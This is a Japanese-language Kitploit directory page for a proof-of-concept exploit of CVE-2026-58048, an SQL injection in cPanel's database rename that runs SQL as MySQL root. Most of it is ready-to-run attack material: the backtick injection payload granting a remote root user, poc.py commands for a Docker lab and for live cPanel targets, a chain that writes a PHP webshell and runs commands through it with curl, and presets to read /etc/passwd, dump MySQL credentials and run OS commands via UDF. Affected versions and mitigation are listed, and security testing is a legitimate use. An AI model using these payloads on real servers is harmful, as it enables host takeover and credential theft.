Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/imbas007/poc-cve-2026-58048
特権昇格エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストデータベースセキュリティラボと実践
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

安全研究项目

リポジトリを見る
161ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-58048

CVSS 4.0: 9.4(緊急) | CWE-89: SQLインジェクション | NVD

認証済み cPanel ユーザー → データベース名変更を介して MySQL root として任意の SQL を実行可能。 cPanel は root として名前変更操作を実行する際、ユーザーのセッション sql_mode(ANSI_QUOTES)を 不適切に保持します — データベース名に含まれるバッククォートが識別子から抜け出し、SQL を注入します。

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

クイックスタート(Docker ラボ)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

ラボモードは自動検出されます — --lab フラグは不要です。

実環境の cPanel ターゲット

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

ペイロードプリセット

カスタム SQL: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

完全な RCE チェーン(ラボ)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

影響を受けるバージョン

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

緩和策: アップグレードするか、cPanel ユーザーから MySQL 機能を無効化してください。

参考リンク

  • cPanel アドバイザリ
  • SecurityOnline

許可されたセキュリティテストおよび教育目的に限ります。

ツールをダウンロード
PresetEffect
admin-user(デフォルト)MySQL 管理者ユーザー rce を作成
compact-admin短い admin ペイロード(64 文字未満 — 実 cPanel の名前制限に適合。検証: r/p)
webshellINTO OUTFILE 経由で PHP シェルを書き込み(--shell /var/www/html/shell.php)
read-fileLOAD_FILE 経由でサーバーファイルを読み取り(--file /etc/passwd)
dump-usersすべての MySQL 資格情報を pwn.users にダンプ
udf-rceUDF 経由の OS コマンド実行